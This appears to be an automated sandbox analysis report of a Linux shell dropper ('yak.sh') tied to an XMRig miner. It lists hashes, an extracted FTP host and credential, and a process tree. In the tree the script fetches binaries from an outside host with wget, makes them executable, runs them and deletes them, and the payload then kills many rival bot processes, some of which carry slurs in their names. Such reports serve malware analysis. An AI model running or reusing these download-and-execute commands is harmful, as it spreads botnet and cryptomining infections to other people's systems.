Analysis

  • max time kernel
    145s
  • max time network
    147s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    24-11-2024 00:00

General

  • Target

    yak.sh

  • Size

    2KB

  • MD5

    f50f60f970a5203dad27c480da7b4519

  • SHA1

    f50f26900efe72f11c37767b5db9a3916a7c76b4

  • SHA256

    ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf

  • SHA512

    40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    linux-it.abuser.eu
  • Port:
    21
  • Username:
    anonymous
  • Password:
    [email protected]

Signatures

  • XMRig Miner payload 2 IoCs
  • Xmrig family
  • Xmrig_linux family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 14 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 2 IoCs
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 64 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 9 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 15 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/yak.sh
    /tmp/yak.sh
    1⤵
      PID:704
      • /usr/bin/wget
        wget http://linux-it.abuser.eu/yakuza.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:707
      • /bin/chmod
        chmod +x yakuza.mips
        2⤵
        • File and Directory Permissions Modification
        PID:731
      • /tmp/yakuza.mips
        ./yakuza.mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:732
      • /bin/rm
        rm -rf yakuza.mips
        2⤵
        • System Network Configuration Discovery
        PID:734
      • /usr/bin/wget
        wget http://linux-it.abuser.eu/yakuza.mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:735
      • /bin/chmod
        chmod +x yakuza.mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:736
      • /tmp/yakuza.mipsel
        ./yakuza.mipsel
        2⤵
        • System Network Configuration Discovery
        PID:737
        • /bin/sh
          sh -c "pkill -9 902i13 || busybox pkill -9 902i13"
          3⤵
            PID:742
            • /usr/bin/pkill
              pkill -9 902i13
              4⤵
              • Reads CPU attributes
              PID:744
            • /bin/busybox
              busybox pkill -9 902i13
              4⤵
                PID:745
            • /bin/sh
              sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"
              3⤵
                PID:746
                • /usr/bin/pkill
                  pkill -9 BzSxLxBxeY
                  4⤵
                  • Reads runtime system information
                  PID:747
                • /bin/busybox
                  busybox pkill -9 BzSxLxBxeY
                  4⤵
                    PID:748
                • /bin/sh
                  sh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"
                  3⤵
                    PID:754
                    • /usr/bin/pkill
                      pkill -9 HOHO-LUGO7
                      4⤵
                        PID:755
                      • /bin/busybox
                        busybox pkill -9 HOHO-LUGO7
                        4⤵
                          PID:756
                      • /bin/sh
                        sh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"
                        3⤵
                          PID:757
                          • /usr/bin/pkill
                            pkill -9 HOHO-U79OL
                            4⤵
                              PID:758
                            • /bin/busybox
                              busybox pkill -9 HOHO-U79OL
                              4⤵
                                PID:759
                            • /bin/sh
                              sh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"
                              3⤵
                                PID:768
                                • /usr/bin/pkill
                                  pkill -9 JuYfouyf87
                                  4⤵
                                  • Reads CPU attributes
                                  PID:769
                                • /bin/busybox
                                  busybox pkill -9 JuYfouyf87
                                  4⤵
                                    PID:771
                                • /bin/sh
                                  sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
                                  3⤵
                                    PID:782
                                    • /usr/bin/pkill
                                      pkill -9 NiGGeR69xd
                                      4⤵
                                      • Reads CPU attributes
                                      PID:784
                                    • /bin/busybox
                                      busybox pkill -9 NiGGeR69xd
                                      4⤵
                                        PID:788
                                    • /bin/sh
                                      sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
                                      3⤵
                                        PID:795
                                        • /usr/bin/pkill
                                          pkill -9 SO190Ij1X
                                          4⤵
                                            PID:797
                                          • /bin/busybox
                                            busybox pkill -9 SO190Ij1X
                                            4⤵
                                              PID:798
                                          • /bin/sh
                                            sh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"
                                            3⤵
                                              PID:812
                                              • /usr/bin/pkill
                                                pkill -9 LOLKIKEEEDDE
                                                4⤵
                                                • Reads runtime system information
                                                PID:813
                                              • /bin/busybox
                                                busybox pkill -9 LOLKIKEEEDDE
                                                4⤵
                                                  PID:814
                                              • /bin/sh
                                                sh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"
                                                3⤵
                                                  PID:821
                                                  • /usr/bin/pkill
                                                    pkill -9 ekjheory98e
                                                    4⤵
                                                    • Reads CPU attributes
                                                    PID:822
                                                  • /bin/busybox
                                                    busybox pkill -9 ekjheory98e
                                                    4⤵
                                                      PID:825
                                                  • /bin/sh
                                                    sh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"
                                                    3⤵
                                                      PID:837
                                                      • /usr/bin/pkill
                                                        pkill -9 scansh4
                                                        4⤵
                                                        • Reads CPU attributes
                                                        • Reads runtime system information
                                                        PID:839
                                                      • /bin/busybox
                                                        busybox pkill -9 scansh4
                                                        4⤵
                                                          PID:841
                                                      • /bin/sh
                                                        sh -c "pkill -9 MDMA || busybox pkill -9 MDMA"
                                                        3⤵
                                                          PID:843
                                                          • /usr/bin/pkill
                                                            pkill -9 MDMA
                                                            4⤵
                                                              PID:844
                                                            • /bin/busybox
                                                              busybox pkill -9 MDMA
                                                              4⤵
                                                                PID:845
                                                            • /bin/sh
                                                              sh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"
                                                              3⤵
                                                                PID:851
                                                                • /usr/bin/pkill
                                                                  pkill -9 fdevalvex
                                                                  4⤵
                                                                  • Reads CPU attributes
                                                                  • Reads runtime system information
                                                                  PID:852
                                                                • /bin/busybox
                                                                  busybox pkill -9 fdevalvex
                                                                  4⤵
                                                                    PID:853
                                                                • /bin/sh
                                                                  sh -c "pkill -9 scanspc || busybox pkill -9 scanspc"
                                                                  3⤵
                                                                    PID:854
                                                                    • /usr/bin/pkill
                                                                      pkill -9 scanspc
                                                                      4⤵
                                                                      • Reads CPU attributes
                                                                      PID:855
                                                                    • /bin/busybox
                                                                      busybox pkill -9 scanspc
                                                                      4⤵
                                                                        PID:856
                                                                    • /bin/sh
                                                                      sh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"
                                                                      3⤵
                                                                        PID:862
                                                                        • /usr/bin/pkill
                                                                          pkill -9 MELTEDNINJAREALZ
                                                                          4⤵
                                                                          • Reads CPU attributes
                                                                          PID:863
                                                                        • /bin/busybox
                                                                          busybox pkill -9 MELTEDNINJAREALZ
                                                                          4⤵
                                                                            PID:864
                                                                        • /bin/sh
                                                                          sh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"
                                                                          3⤵
                                                                            PID:865
                                                                            • /usr/bin/pkill
                                                                              pkill -9 flexsonskids
                                                                              4⤵
                                                                              • Reads CPU attributes
                                                                              PID:866
                                                                            • /bin/busybox
                                                                              busybox pkill -9 flexsonskids
                                                                              4⤵
                                                                                PID:868
                                                                            • /bin/sh
                                                                              sh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"
                                                                              3⤵
                                                                                PID:873
                                                                                • /usr/bin/pkill
                                                                                  pkill -9 scanx86
                                                                                  4⤵
                                                                                  • Reads CPU attributes
                                                                                  PID:874
                                                                                • /bin/busybox
                                                                                  busybox pkill -9 scanx86
                                                                                  4⤵
                                                                                    PID:875
                                                                                • /bin/sh
                                                                                  sh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"
                                                                                  3⤵
                                                                                    PID:879
                                                                                    • /usr/bin/pkill
                                                                                      pkill -9 MISAKI-U79OL
                                                                                      4⤵
                                                                                        PID:880
                                                                                      • /bin/busybox
                                                                                        busybox pkill -9 MISAKI-U79OL
                                                                                        4⤵
                                                                                          PID:884
                                                                                      • /bin/sh
                                                                                        sh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"
                                                                                        3⤵
                                                                                          PID:892
                                                                                          • /usr/bin/pkill
                                                                                            pkill -9 foAxi102kxe
                                                                                            4⤵
                                                                                            • Reads CPU attributes
                                                                                            • Reads runtime system information
                                                                                            PID:894
                                                                                          • /bin/busybox
                                                                                            busybox pkill -9 foAxi102kxe
                                                                                            4⤵
                                                                                              PID:895
                                                                                          • /bin/sh
                                                                                            sh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"
                                                                                            3⤵
                                                                                              PID:904
                                                                                              • /usr/bin/pkill
                                                                                                pkill -9 swodjwodjwoj
                                                                                                4⤵
                                                                                                • Reads CPU attributes
                                                                                                • Reads runtime system information
                                                                                                PID:906
                                                                                              • /bin/busybox
                                                                                                busybox pkill -9 swodjwodjwoj
                                                                                                4⤵
                                                                                                  PID:911
                                                                                              • /bin/sh
                                                                                                sh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"
                                                                                                3⤵
                                                                                                  PID:920
                                                                                                  • /usr/bin/pkill
                                                                                                    pkill -9 MmKiy7f87l
                                                                                                    4⤵
                                                                                                    • Reads CPU attributes
                                                                                                    PID:921
                                                                                                  • /bin/busybox
                                                                                                    busybox pkill -9 MmKiy7f87l
                                                                                                    4⤵
                                                                                                      PID:923
                                                                                                  • /bin/sh
                                                                                                    sh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"
                                                                                                    3⤵
                                                                                                      PID:936
                                                                                                      • /usr/bin/pkill
                                                                                                        pkill -9 freecookiex86
                                                                                                        4⤵
                                                                                                        • Reads CPU attributes
                                                                                                        PID:937
                                                                                                      • /bin/busybox
                                                                                                        busybox pkill -9 freecookiex86
                                                                                                        4⤵
                                                                                                          PID:939
                                                                                                      • /bin/sh
                                                                                                        sh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"
                                                                                                        3⤵
                                                                                                          PID:945
                                                                                                          • /usr/bin/pkill
                                                                                                            pkill -9 sysgpu
                                                                                                            4⤵
                                                                                                            • Reads runtime system information
                                                                                                            PID:946
                                                                                                          • /bin/busybox
                                                                                                            busybox pkill -9 sysgpu
                                                                                                            4⤵
                                                                                                              PID:948
                                                                                                          • /bin/sh
                                                                                                            sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"
                                                                                                            3⤵
                                                                                                              PID:950
                                                                                                              • /usr/bin/pkill
                                                                                                                pkill -9 NiGGeR69xd
                                                                                                                4⤵
                                                                                                                • Reads runtime system information
                                                                                                                PID:951
                                                                                                              • /bin/busybox
                                                                                                                busybox pkill -9 NiGGeR69xd
                                                                                                                4⤵
                                                                                                                  PID:952
                                                                                                              • /bin/sh
                                                                                                                sh -c "pkill -9 frgege || busybox pkill -9 frgege"
                                                                                                                3⤵
                                                                                                                  PID:953
                                                                                                                  • /usr/bin/pkill
                                                                                                                    pkill -9 frgege
                                                                                                                    4⤵
                                                                                                                    • Reads CPU attributes
                                                                                                                    • Reads runtime system information
                                                                                                                    PID:954
                                                                                                                  • /bin/busybox
                                                                                                                    busybox pkill -9 frgege
                                                                                                                    4⤵
                                                                                                                      PID:955
                                                                                                                  • /bin/sh
                                                                                                                    sh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"
                                                                                                                    3⤵
                                                                                                                      PID:956
                                                                                                                      • /usr/bin/pkill
                                                                                                                        pkill -9 sysupdater
                                                                                                                        4⤵
                                                                                                                          PID:957
                                                                                                                        • /bin/busybox
                                                                                                                          busybox pkill -9 sysupdater
                                                                                                                          4⤵
                                                                                                                            PID:958
                                                                                                                        • /bin/sh
                                                                                                                          sh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"
                                                                                                                          3⤵
                                                                                                                            PID:959
                                                                                                                            • /usr/bin/pkill
                                                                                                                              pkill -9 0DnAzepd
                                                                                                                              4⤵
                                                                                                                              • Reads runtime system information
                                                                                                                              PID:960
                                                                                                                            • /bin/busybox
                                                                                                                              busybox pkill -9 0DnAzepd
                                                                                                                              4⤵
                                                                                                                                PID:961
                                                                                                                            • /bin/sh
                                                                                                                              sh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"
                                                                                                                              3⤵
                                                                                                                                PID:962
                                                                                                                                • /usr/bin/pkill
                                                                                                                                  pkill -9 NiGGeRD0nks69
                                                                                                                                  4⤵
                                                                                                                                  • Reads runtime system information
                                                                                                                                  PID:963
                                                                                                                                • /bin/busybox
                                                                                                                                  busybox pkill -9 NiGGeRD0nks69
                                                                                                                                  4⤵
                                                                                                                                    PID:964
                                                                                                                                • /bin/sh
                                                                                                                                  sh -c "pkill -9 frgreu || busybox pkill -9 frgreu"
                                                                                                                                  3⤵
                                                                                                                                    PID:965
                                                                                                                                    • /usr/bin/pkill
                                                                                                                                      pkill -9 frgreu
                                                                                                                                      4⤵
                                                                                                                                        PID:966
                                                                                                                                      • /bin/busybox
                                                                                                                                        busybox pkill -9 frgreu
                                                                                                                                        4⤵
                                                                                                                                          PID:967
                                                                                                                                      • /bin/sh
                                                                                                                                        sh -c "pkill -9 telnetd || busybox pkill -9 telnetd"
                                                                                                                                        3⤵
                                                                                                                                          PID:968
                                                                                                                                          • /usr/bin/pkill
                                                                                                                                            pkill -9 telnetd
                                                                                                                                            4⤵
                                                                                                                                            • Reads CPU attributes
                                                                                                                                            PID:969
                                                                                                                                          • /bin/busybox
                                                                                                                                            busybox pkill -9 telnetd
                                                                                                                                            4⤵
                                                                                                                                              PID:970
                                                                                                                                          • /bin/sh
                                                                                                                                            sh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"
                                                                                                                                            3⤵
                                                                                                                                              PID:971
                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                pkill -9 0x766f6964
                                                                                                                                                4⤵
                                                                                                                                                • Reads CPU attributes
                                                                                                                                                PID:972
                                                                                                                                              • /bin/busybox
                                                                                                                                                busybox pkill -9 0x766f6964
                                                                                                                                                4⤵
                                                                                                                                                  PID:973
                                                                                                                                              • /bin/sh
                                                                                                                                                sh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"
                                                                                                                                                3⤵
                                                                                                                                                  PID:974
                                                                                                                                                  • /usr/bin/pkill
                                                                                                                                                    pkill -9 NiGGeRd0nks1337
                                                                                                                                                    4⤵
                                                                                                                                                      PID:975
                                                                                                                                                    • /bin/busybox
                                                                                                                                                      busybox pkill -9 NiGGeRd0nks1337
                                                                                                                                                      4⤵
                                                                                                                                                        PID:976
                                                                                                                                                    • /bin/sh
                                                                                                                                                      sh -c "pkill -9 gaft || busybox pkill -9 gaft"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:977
                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                          pkill -9 gaft
                                                                                                                                                          4⤵
                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                          • Reads runtime system information
                                                                                                                                                          PID:978
                                                                                                                                                        • /bin/busybox
                                                                                                                                                          busybox pkill -9 gaft
                                                                                                                                                          4⤵
                                                                                                                                                            PID:979
                                                                                                                                                        • /bin/sh
                                                                                                                                                          sh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:980
                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                              pkill -9 urasgbsigboa
                                                                                                                                                              4⤵
                                                                                                                                                                PID:981
                                                                                                                                                              • /bin/busybox
                                                                                                                                                                busybox pkill -9 urasgbsigboa
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:982
                                                                                                                                                              • /bin/sh
                                                                                                                                                                sh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:983
                                                                                                                                                                  • /usr/bin/pkill
                                                                                                                                                                    pkill -9 120i3UI49
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Reads CPU attributes
                                                                                                                                                                    PID:984
                                                                                                                                                                  • /bin/busybox
                                                                                                                                                                    busybox pkill -9 120i3UI49
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:985
                                                                                                                                                                  • /bin/sh
                                                                                                                                                                    sh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:989
                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                        pkill -9 OaF3
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:990
                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                          busybox pkill -9 OaF3
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:991
                                                                                                                                                                        • /bin/sh
                                                                                                                                                                          sh -c "pkill -9 geae || busybox pkill -9 geae"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:992
                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                              pkill -9 geae
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                              PID:993
                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                              busybox pkill -9 geae
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:994
                                                                                                                                                                            • /bin/sh
                                                                                                                                                                              sh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:995
                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                  pkill -9 vaiolmao
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                  PID:996
                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                  busybox pkill -9 vaiolmao
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:997
                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                  sh -c "pkill -9 123123a || busybox pkill -9 123123a"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:998
                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                      pkill -9 123123a
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                      PID:999
                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                      busybox pkill -9 123123a
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1000
                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                      sh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1001
                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                          pkill -9 Ofurain0n4H34D
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:1002
                                                                                                                                                                                          • /bin/busybox
                                                                                                                                                                                            busybox pkill -9 Ofurain0n4H34D
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1003
                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                            sh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1004
                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                pkill -9 ggTrex
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1005
                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                  busybox pkill -9 ggTrex
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:1006
                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                  sh -c "pkill -9 wasads || busybox pkill -9 wasads"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:1007
                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                      pkill -9 wasads
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                      PID:1008
                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                      busybox pkill -9 wasads
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:1009
                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                      sh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1010
                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                          pkill -9 1293194hjXD
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                          PID:1011
                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                          busybox pkill -9 1293194hjXD
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:1012
                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                          sh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:1013
                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                              pkill -9 OthLaLosn
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                              PID:1014
                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                              busybox pkill -9 OthLaLosn
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1015
                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                              sh -c "pkill -9 ggt || busybox pkill -9 ggt"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:1016
                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                  pkill -9 ggt
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                  PID:1017
                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                  busybox pkill -9 ggt
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1018
                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                  sh -c "pkill -9 wget-log || busybox pkill -9 wget-log"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1019
                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                      pkill -9 wget-log
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                      PID:1020
                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                      busybox pkill -9 wget-log
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:1021
                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                      sh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1022
                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                          pkill -9 1337SoraLOADER
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1023
                                                                                                                                                                                                                          • /bin/busybox
                                                                                                                                                                                                                            busybox pkill -9 1337SoraLOADER
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1024
                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                            sh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:1025
                                                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                                                pkill -9 SAIAKINA
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:1026
                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                  busybox pkill -9 SAIAKINA
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:1027
                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                  sh -c "pkill -9 ggtq || busybox pkill -9 ggtq"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1028
                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                      pkill -9 ggtq
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                      PID:1029
                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                      busybox pkill -9 ggtq
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1030
                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                      sh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1031
                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                          pkill -9 1378bfp919GRB1Q2
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                          PID:1032
                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                          busybox pkill -9 1378bfp919GRB1Q2
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:1033
                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                          sh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1034
                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                              pkill -9 SAIAKUSO
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                              PID:1035
                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                              busybox pkill -9 SAIAKUSO
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:1036
                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                              sh -c "pkill -9 ggtr || busybox pkill -9 ggtr"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:1037
                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                  pkill -9 ggtr
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                  PID:1038
                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                  busybox pkill -9 ggtr
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:1039
                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                  sh -c "pkill -9 14Fa || busybox pkill -9 14Fa"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:1040
                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                      pkill -9 14Fa
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                      PID:1041
                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                      busybox pkill -9 14Fa
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:1042
                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                      sh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:1043
                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                          pkill -9 SEXSLAVE1337
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                          PID:1044
                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                          busybox pkill -9 SEXSLAVE1337
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:1045
                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                          sh -c "pkill -9 ggtt || busybox pkill -9 ggtt"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:1046
                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                              pkill -9 ggtt
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                              PID:1047
                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                              busybox pkill -9 ggtt
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:1048
                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                              sh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:1049
                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                  pkill -9 1902a3u912u3u4
